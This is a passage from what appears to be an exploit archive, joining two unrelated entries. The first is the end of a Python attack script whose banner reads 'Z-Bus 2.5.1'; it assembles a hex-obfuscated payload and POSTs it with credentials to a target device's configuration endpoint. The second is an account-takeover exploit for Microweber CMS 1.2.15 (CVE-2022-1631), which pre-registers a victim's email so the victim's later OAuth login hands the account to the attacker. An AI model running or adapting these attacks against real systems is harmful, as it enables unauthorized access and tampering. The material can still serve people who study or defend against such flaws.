self.hlank += '\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25'
self.hlank += '\x32\x32\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C'
self.flank = '\x79\x25\x32\x32\x25\x33\x41\x25\x32\x32\x74'
self.flank += '\x72\x75\x65\x25\x32\x32\x25\x37\x44'#######'
self.clear = f'{self.blank}{self.dlank}{self.clank}{self.slank}{self.glank}{self.hlank}{self.flank}'
htreq = requests.post(self.target+self.savs, data=self.clear, headers=self.headers, auth=self.creds)
if not 'success' in htreq.text:
print('didn\'t work!')
exit(18)
else:
print('done.')
exit(-1)
def main(self):
print('-'*70)
print('Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at', self.start)
self.memo(), self.mtask()
if __name__ == '__main__':
Wiser().main()
# Exploit Title: Microweber CMS 1.2.15 - Account Takeover
# Date: 2022-05-09
# Exploit Author: Manojkumar J
# Vendor Homepage: https://github.com/microweber/microweber
# Software Link: https://github.com/microweber/microweber/releases/tag/v1.2.15
# Version: <=1.2.15
# Tested on: Windows10
# CVE : CVE-2022-1631
# Description:
Microweber Drag and Drop Website Builder E-commerce CMS v1.2.15 Oauth
Misconfiguration Leads To Account Takeover.
# Steps to exploit:
1. Create an account with the victim's email address.
Register endpoint: https://target-website.com/register#
2. When the victim tries to login with default Oauth providers like Google,
Github, Microsoft, Twitter, Linkedin, Telegram or Facebook etc(auth login)
with that same e-mail id that we created account before, via this way we
can take over the victim's account with the recently created login
credentials.